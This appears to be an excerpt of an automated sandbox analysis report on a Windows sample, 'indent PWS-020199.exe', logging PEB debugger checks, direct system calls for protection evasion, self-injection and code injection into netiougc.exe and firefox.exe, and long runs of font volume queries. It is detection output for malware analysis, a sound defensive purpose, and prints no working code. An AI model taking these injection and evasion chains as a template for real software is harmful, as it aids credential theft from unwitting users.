            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B4690 mov eax, dword ptr fs:[00000030h]2_2_014B4690
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EC6A6 mov eax, dword ptr fs:[00000030h]2_2_014EC6A6
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E66B0 mov eax, dword ptr fs:[00000030h]2_2_014E66B0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01530946 mov eax, dword ptr fs:[00000030h]2_2_01530946
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01584940 mov eax, dword ptr fs:[00000030h]2_2_01584940
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F096E mov eax, dword ptr fs:[00000030h]2_2_014F096E
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F096E mov edx, dword ptr fs:[00000030h]2_2_014F096E
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F096E mov eax, dword ptr fs:[00000030h]2_2_014F096E
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01554978 mov eax, dword ptr fs:[00000030h]2_2_01554978
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01554978 mov eax, dword ptr fs:[00000030h]2_2_01554978
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014D6962 mov eax, dword ptr fs:[00000030h]2_2_014D6962
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014D6962 mov eax, dword ptr fs:[00000030h]2_2_014D6962
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014D6962 mov eax, dword ptr fs:[00000030h]2_2_014D6962
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0153C97C mov eax, dword ptr fs:[00000030h]2_2_0153C97C
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0153C912 mov eax, dword ptr fs:[00000030h]2_2_0153C912
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014A8918 mov eax, dword ptr fs:[00000030h]2_2_014A8918
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014A8918 mov eax, dword ptr fs:[00000030h]2_2_014A8918
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0152E908 mov eax, dword ptr fs:[00000030h]2_2_0152E908
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0152E908 mov eax, dword ptr fs:[00000030h]2_2_0152E908
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0153892A mov eax, dword ptr fs:[00000030h]2_2_0153892A
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0154892B mov eax, dword ptr fs:[00000030h]2_2_0154892B
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0157A9D3 mov eax, dword ptr fs:[00000030h]2_2_0157A9D3
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015469C0 mov eax, dword ptr fs:[00000030h]2_2_015469C0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014BA9D0 mov eax, dword ptr fs:[00000030h]2_2_014BA9D0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014BA9D0 mov eax, dword ptr fs:[00000030h]2_2_014BA9D0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014BA9D0 mov eax, dword ptr fs:[00000030h]2_2_014BA9D0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014BA9D0 mov eax, dword ptr fs:[00000030h]2_2_014BA9D0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014BA9D0 mov eax, dword ptr fs:[00000030h]2_2_014BA9D0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014BA9D0 mov eax, dword ptr fs:[00000030h]2_2_014BA9D0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E49D0 mov eax, dword ptr fs:[00000030h]2_2_014E49D0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0153E9E0 mov eax, dword ptr fs:[00000030h]2_2_0153E9E0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E29F9 mov eax, dword ptr fs:[00000030h]2_2_014E29F9
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E29F9 mov eax, dword ptr fs:[00000030h]2_2_014E29F9
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015389B3 mov esi, dword ptr fs:[00000030h]2_2_015389B3
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015389B3 mov eax, dword ptr fs:[00000030h]2_2_015389B3
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015389B3 mov eax, dword ptr fs:[00000030h]2_2_015389B3
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B09AD mov eax, dword ptr fs:[00000030h]2_2_014B09AD
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B09AD mov eax, dword ptr fs:[00000030h]2_2_014B09AD
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C29A0 mov eax, dword ptr fs:[00000030h]2_2_014C29A0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C29A0 mov eax, dword ptr fs:[00000030h]2_2_014C29A0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C29A0 mov eax, dword ptr fs:[00000030h]2_2_014C29A0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C29A0 mov eax, dword ptr fs:[00000030h]2_2_014C29A0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C29A0 mov eax, dword ptr fs:[00000030h]2_2_014C29A0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C29A0 mov eax, dword ptr fs:[00000030h]2_2_014C29A0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C29A0 mov eax, dword ptr fs:[00000030h]2_2_014C29A0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C29A0 mov eax, dword ptr fs:[00000030h]2_2_014C29A0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C29A0 mov eax, dword ptr fs:[00000030h]2_2_014C29A0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C29A0 mov eax, dword ptr fs:[00000030h]2_2_014C29A0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C29A0 mov eax, dword ptr fs:[00000030h]2_2_014C29A0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C29A0 mov eax, dword ptr fs:[00000030h]2_2_014C29A0
            Source: C:\Users\user\Desktop\indent PWS-020199.exe
                Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                NtWriteVirtualMemory: Direct from: 0x76F0490C
                NtAllocateVirtualMemory: Direct from: 0x76F03C9C
                NtClose: Direct from: 0x76F02B6C
                NtReadVirtualMemory: Direct from: 0x76F02E8C
                NtCreateKey: Direct from: 0x76F02C6C
                NtSetInformationThread: Direct from: 0x76F02B4C
                NtQueryAttributesFile: Direct from: 0x76F02E6C
                NtAllocateVirtualMemory: Direct from: 0x76F048EC
                NtQuerySystemInformation: Direct from: 0x76F048CC
                NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                NtOpenSection: Direct from: 0x76F02E0C
                NtSetInformationThread: Direct from: 0x76EF63F9
                NtDeviceIoControlFile: Direct from: 0x76F02AEC
                NtAllocateVirtualMemory: Direct from: 0x76F02BEC
                NtCreateFile: Direct from: 0x76F02FEC
                NtOpenFile: Direct from: 0x76F02DCC
                NtQueryInformationToken: Direct from: 0x76F02CAC
                NtTerminateThread: Direct from: 0x76F02FCC
                NtProtectVirtualMemory: Direct from: 0x76EF7B2E
                NtOpenKeyEx: Direct from: 0x76F02B9C
                NtProtectVirtualMemory: Direct from: 0x76F02F9C
                NtSetInformationProcess: Direct from: 0x76F02C5C
                NtNotifyChangeKey: Direct from: 0x76F03C2C
                NtCreateMutant: Direct from: 0x76F035CC
                NtWriteVirtualMemory: Direct from: 0x76F02E3C
                NtMapViewOfSection: Direct from: 0x76F02D1C
                NtResumeThread: Direct from: 0x76F036AC
                NtAllocateVirtualMemory: Direct from: 0x76F02BFC
                NtReadFile: Direct from: 0x76F02ADC
                NtQuerySystemInformation: Direct from: 0x76F02DFC
                NtDelayExecution: Direct from: 0x76F02DDC
                NtQueryInformationProcess: Direct from: 0x76F02C26
                NtResumeThread: Direct from: 0x76F02FBC
                NtCreateUserProcess: Direct from: 0x76F0371C
            Source: C:\Users\user\Desktop\indent PWS-020199.exe
                Memory written: C:\Users\user\Desktop\indent PWS-020199.exe base: 400000 value starts with: 4D5A
                Section loaded: NULL target: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe protection: execute and read and write
                Section loaded: NULL target: C:\Windows\SysWOW64\netiougc.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netiougc.exe
                Section loaded: NULL target: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe protection: read write
                Section loaded: NULL target: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe protection: execute and read and write
                Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Thread register set: target process: 7220
                Thread APC queued: target process: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
            Source: C:\Users\user\Desktop\indent PWS-020199.exe
                Process created: C:\Users\user\Desktop\indent PWS-020199.exe "C:\Users\user\Desktop\indent PWS-020199.exe"
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                Process created: C:\Windows\SysWOW64\netiougc.exe "C:\Windows\SysWOW64\netiougc.exe"
            Source: C:\Windows\SysWOW64\netiougc.exe
                Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000004.00000002.2905275049.0000000000F30000.00000002.00000001.00040000.00000000.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000004.00000000.1897890801.0000000000F31000.00000002.00000001.00040000.00000000.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000008.00000002.2905634334.00000000018B0000.00000002.00000001.00040000.00000000.sdmp
                Binary or memory string: Shell_TrayWnd
                Binary or memory string: Progman
                Binary or memory string: Progmanlock
                Binary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\indent PWS-020199.exe
                Queries volume information: C:\Users\user\Desktop\indent PWS-020199.exe VolumeInformation
                Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
